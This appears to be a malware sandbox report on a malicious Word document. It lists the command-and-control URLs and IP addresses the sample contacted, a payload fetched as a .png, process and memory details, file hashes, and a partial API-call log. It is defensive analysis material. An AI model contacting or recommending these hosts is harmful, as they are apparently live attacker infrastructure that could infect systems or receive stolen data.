Word Doc. Drops Context Aware Payload

URL Overview

Remarks

The sample contacted only unknown URLs.

URL (5)

URL	Connection Successful	Reputation Status
89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/		Unknown
212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/		Unknown
www.events4u.cz/kas23.png		Unknown
89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/		Unknown
myexternalip.com/raw		Unknown

Involved Hosts

Hostname	IP Addresses	Country	Protocols
www.events4u.cz	93.185.102.11	CZ	HTTP, DNS, TCP
myexternalip.com	78.47.139.102	DE	HTTP, TCP
	89.231.13.38	PL	HTTP, TCP
	212.38.166.20	GB	HTTP, TCP

Monitored Processes

Behavior Information - Sequential View

Process #1: winword.exe

(Host: 337, Network: 0)

Information	Value
ID	#1
File Name	c:\program files\microsoft office\office15\winword.exe
Command Line	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:00:20, Reason: Analysis Target
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:02:06

OS Process Information

Information	Value
PID	0x914
Parent PID	0x568 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 980 0x 97C 0x 978 0x 974 0x 970 0x 96C 0x 94C 0x 948 0x 944 0x 940 0x 93C 0x 918 0x 9CC 0x 9DC 0x A14 0x A80

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00043fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000000d0000	0x000d0000	0x000d1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000e0000	0x000e0000	0x000e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000100000	0x00100000	0x00100fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x0011ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000120000	0x00120000	0x00150fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000160000	0x00160000	0x00161fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000170000	0x00170000	0x0026ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000270000	0x00270000	0x0036ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory		Region Actions
pagefile_0x0000000000380000	0x00380000	0x00386fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000390000	0x00390000	0x0039ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000003a0000	0x003a0000	0x003a1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000003b0000	0x003b0000	0x003b1fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000003d0000	0x003d0000	0x003d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000003f0000	0x003f0000	0x003f0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000410000	0x00410000	0x00410fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000430000	0x00430000	0x00430fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000440000	0x00440000	0x0053ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000540000	0x00540000	0x0063ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000640000	0x00640000	0x0067ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000680000	0x00680000	0x00680fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000690000	0x00690000	0x0069ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000006a0000	0x006a0000	0x00827fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000830000	0x00830000	0x009b0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009c0000	0x009c0000	0x01dbffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001dc0000	0x01dc0000	0x01e9efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ea0000	0x01ea0000	0x01ea0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001eb0000	0x01eb0000	0x01ebffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ed0000	0x01ed0000	0x01ed0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001ef0000	0x01ef0000	0x01ef0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f10000	0x01f10000	0x01f10fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001f30000	0x01f30000	0x01f30fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001f40000	0x01f40000	0x01f44fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001f50000	0x01f50000	0x01f50fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000001f60000	0x01f60000	0x01fdffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000001fe0000	0x01fe0000	0x01fe1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001ff0000	0x01ff0000	0x01ffffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002000000	0x02000000	0x02000fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000002010000	0x02010000	0x02010fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000002020000	0x02020000	0x0211ffff	Private Memory	Readable, Writable	Region Actions
msxml6r.dll	0x02120000	0x02120fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db	0x02130000	0x02156fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002160000	0x02160000	0x0225ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002260000	0x02260000	0x02652fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02660000	0x0292efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002930000	0x02930000	0x02930fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002940000	0x02940000	0x02940fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002960000	0x02960000	0x02960fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002980000	0x02980000	0x02980fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029a0000	0x029a0000	0x029a0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002a20000	0x02a20000	0x02a20fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000002a30000	0x02a30000	0x02a30fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000002a40000	0x02a40000	0x02a40fff	Private Memory	Readable, Writable	Region Actions
c_1255.nls	0x02a50000	0x02a60fff	Memory Mapped File	Readable	Region Actions
private_0x0000000002a90000	0x02a90000	0x02b8ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b90000	0x02b90000	0x02c8ffff	Private Memory	Readable, Writable	Region Actions
kernelbase.dll.mui	0x02c90000	0x02d4ffff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000002d50000	0x02d50000	0x02e4ffff	Private Memory	Readable, Writable	Region Actions
segoeui.ttf	0x02e50000	0x02ecefff	Memory Mapped File	Readable	Region Actions
private_0x0000000002ee0000	0x02ee0000	0x02f5ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002f80000	0x02f80000	0x02f9efff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002fa0000	0x02fa0000	0x0309ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000030a0000	0x030a0000	0x0349ffff	Pagefile Backed Memory	Readable	Region Actions
staticcache.dat	0x034a0000	0x03dcffff	Memory Mapped File	Readable	Region Actions
private_0x0000000003dd0000	0x03dd0000	0x03ecffff	Private Memory	Readable, Writable	Region Actions
seguisb.ttf	0x03ed0000	0x03f33fff	Memory Mapped File	Readable	Region Actions
private_0x0000000003fb0000	0x03fb0000	0x03fbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000003fc0000	0x03fc0000	0x040bffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004160000	0x04160000	0x041dffff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000004260000	0x04260000	0x0435ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000043c0000	0x043c0000	0x043cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000043d0000	0x043d0000	0x044cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000045c0000	0x045c0000	0x045cffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000045d0000	0x045d0000	0x04dcffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000004dd0000	0x04dd0000	0x04ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000004f30000	0x04f30000	0x0502ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005030000	0x05030000	0x0522ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000005270000	0x05270000	0x0536ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000054f0000	0x054f0000	0x055effff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000055f0000	0x055f0000	0x065effff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000066d0000	0x066d0000	0x0674ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000067d0000	0x067d0000	0x0684ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006930000	0x06930000	0x069affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000069b0000	0x069b0000	0x06daffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000006db0000	0x06db0000	0x071affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000071b0000	0x071b0000	0x079affff	Private Memory	Readable, Writable	Region Actions
private_0x00000000079b0000	0x079b0000	0x07db0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000007dc0000	0x07dc0000	0x081c0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000081d0000	0x081d0000	0x085d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000085e0000	0x085e0000	0x087dffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x00000000087e0000	0x087e0000	0x08fdffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000008fe0000	0x08fe0000	0x0949ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000094a0000	0x094a0000	0x0989ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000037440000	0x37440000	0x3744ffff	Private Memory	Readable, Writable, Executable	Region Actions
msvcp100.dll	0x73d80000	0x73e17fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcr100.dll	0x73e20000	0x73ef1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osppc.dll	0x74be0000	0x74c12fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x77320000	0x7743efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x77440000	0x77539fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x77710000	0x77716fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
winword.exe	0x13f200000	0x13f3d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000007febef30000	0x7febef30000	0x7febef3ffff	Private Memory	Readable, Writable, Executable	Region Actions
riched20.dll	0x7fee90a0000	0x7fee92c2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwrite.dll	0x7fee9510000	0x7fee968dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msores.dll	0x7fee9690000	0x7feee37afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mso.dll	0x7feee380000	0x7fef0630fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwlib.dll	0x7fef0640000	0x7fef20befff	Memory Mapped File	Readable, Writable, Executable	Region Actions
adal.dll	0x7fef20f0000	0x7fef21c8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10warp.dll	0x7fef21d0000	0x7fef239ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msointl.dll	0x7fef23a0000	0x7fef2716fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oart.dll	0x7fef2720000	0x7fef3b33fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoreei.dll	0x7fef3d20000	0x7fef3db8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d11.dll	0x7fef3dc0000	0x7fef3e85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msptls.dll	0x7fef3e90000	0x7fef4005fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d2d1.dll	0x7fef4010000	0x7fef40f1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msohev.dll	0x7fef4280000	0x7fef429bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mscoree.dll	0x7fef42a0000	0x7fef430efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wwintl.dll	0x7fef4310000	0x7fef43e3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msimg32.dll	0x7fef43f0000	0x7fef43f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msxml6.dll	0x7fef79d0000	0x7fef7bc1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winspool.drv	0x7fef7c60000	0x7fef7cd0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
office.odf	0x7fef94a0000	0x7fef999ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x7fef99a0000	0x7fef9cb5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dxgi.dll	0x7fefa130000	0x7fefa1d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1core.dll	0x7fefa1e0000	0x7fefa234fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
d3d10_1.dll	0x7fefa240000	0x7fefa273fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x7fefa500000	0x7fefa563fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x7fefa570000	0x7fefa5e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
windowscodecs.dll	0x7fefad90000	0x7fefaeb9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x7fefaec0000	0x7fefaed7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdiplus.dll	0x7fefb080000	0x7fefb294fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x7fefb2a0000	0x7fefb2f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x7fefb950000	0x7fefb960fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x7fefbde0000	0x7fefbe0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x7fefbe40000	0x7fefbf6bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x7fefbfc0000	0x7fefc1b3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x7fefc650000	0x7fefc65bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x7fefca60000	0x7fefcaa6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
For performance reasons, the remaining 200 entries are omitted. The remaining entries can be found in flog.txt.

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp	0.50 KB (512 bytes)	MD5: bf619eac0cdf3f68d496ea9344137e8b SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560		File Actions Show Properties Download

Threads

Thread 0x918

(Host: 312, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee8aa0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoVBADigSigCallDlg, address_out = 0x7fee8bad128	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoVbaInitSecurity, address_out = 0x7fee8b1a204	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFIEPolicyAndVersion, address_out = 0x7fee8ac24b8	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFAnsiCodePageSupportsLCID, address_out = 0x7fee8b1a09c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFInitOffice, address_out = 0x7fee8abf98c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoUninitOffice, address_out = 0x7fee8aaec34	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetFontSettings, address_out = 0x7fee8aa3fac	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoRgchToRgwch, address_out = 0x7fee8ab2878	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface, address_out = 0x7fee8aa7a5c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrSimpleQueryInterface2, address_out = 0x7fee8aa79d4	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateControl, address_out = 0x7fee8aa870c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLongLoad, address_out = 0x7fee8becb78	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLongSave, address_out = 0x7fee8becb9c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetTooltips, address_out = 0x7fee8ab23e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetTooltips, address_out = 0x7fee8b1a49c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFLoadToolbarSet, address_out = 0x7fee8b07d64	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateToolbarSet, address_out = 0x7fee8aa55d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHpalOffice, address_out = 0x7fee8ab05e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFWndProcNeeded, address_out = 0x7fee8aa3cd4	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFWndProc, address_out = 0x7fee8aa6c80	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateITFCHwnd, address_out = 0x7fee8aa3d08	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoDestroyITFC, address_out = 0x7fee8aaeaa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFPitbsFromHwndAndMsg, address_out = 0x7fee8aae064	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFGetComponentManager, address_out = 0x7fee8aa7af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoMultiByteToWideChar, address_out = 0x7fee8ab005c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoWideCharToMultiByte, address_out = 0x7fee8aa8b00	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoHrRegisterAll, address_out = 0x7fee8bacb04	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetComponentManager, address_out = 0x7fee8ab47c4	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateStdComponentManager, address_out = 0x7fee8aa3e0c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFHandledMessageNeeded, address_out = 0x7fee8aaab58	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoPeekMessage, address_out = 0x7fee8aaa820	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFCreateIPref, address_out = 0x7fee8aa15ac	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoDestroyIPref, address_out = 0x7fee8aaebfc	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoChsFromLid, address_out = 0x7fee8aa1414	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoCpgFromChs, address_out = 0x7fee8aa65d4	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoSetLocale, address_out = 0x7fee8aa1554	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee8aa3dbc	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoSetVbaInterfaces, address_out = 0x7fee8bad23c	1	Fn
Module	Get Address	module_name = Unknown module name, function = MsoGetControlInstanceId, address_out = 0x7fee8b7733c	1	Fn
Environment	Get Environment String	name = DDRYBUR	1	Fn
Module	Get Filename	process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\Licenses	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = }	1	Fn
Module	Get Address	module_name = Unknown module name, function = SysFreeString, address_out = 0x7feff5d1320	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLib, address_out = 0x7feff5df1e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = RegisterTypeLib, address_out = 0x7feff62caa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = QueryPathOfRegTypeLib, address_out = 0x7feff661760	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feff6620d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleTranslateColor, address_out = 0x7feff5fc760	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreateFontIndirect, address_out = 0x7feff62ecd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePictureIndirect, address_out = 0x7feff62e840	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleLoadPicture, address_out = 0x7feff63f420	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePropertyFrameIndirect, address_out = 0x7feff634ec0	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleCreatePropertyFrame, address_out = 0x7feff639350	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleIconToCursor, address_out = 0x7feff606e40	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feff5da550	1	Fn
Module	Get Address	module_name = Unknown module name, function = OleLoadPictureEx, address_out = 0x7feff63f320	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\system32\user32.dll, base_address = 0x77440000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x774594f0	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x77455f08	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x77452b00	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x7744ab64	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x77455c30	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x7744a730	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x7744a5b4	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = oleaut32.dll, base_address = 0x7feff5d0000	1	Fn
Module	Get Address	module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feff5d2270	1	Fn
Module	Get Address	module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feff5da550	1	Fn
Module	Get Address	module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feff6620d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feff65dbd0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feff5d5c90	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feff5d6330	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feff5f66c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feff5d4710	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feff5d48f0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feff60b640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feff60b360	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feff612640	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feff5f58a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feff5f5820	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feff60af20	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feff62a0c0	1	Fn
Module	Get Address	module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feff662160	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feff5f5af0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feff5f5a90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feff5f5a60	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feff5f5a30	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feff5d60b0	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feff5d3e90	1	Fn
Module	Get Address	module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feff629f80	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormat, address_out = 0x7feff659b20	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feff659aa0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feff659990	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feff659890	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feff659770	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feff63b8d0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarMonthName, address_out = 0x7feff63b800	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAdd, address_out = 0x7feff6548e0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarAnd, address_out = 0x7feff659470	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarCat, address_out = 0x7feff6596a0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarDiv, address_out = 0x7feff652fe0	1	Fn
Module	Get Address	module_name = Unknown module name, function = VarEqv, address_out = 0x7feff659cf0	1	Fn
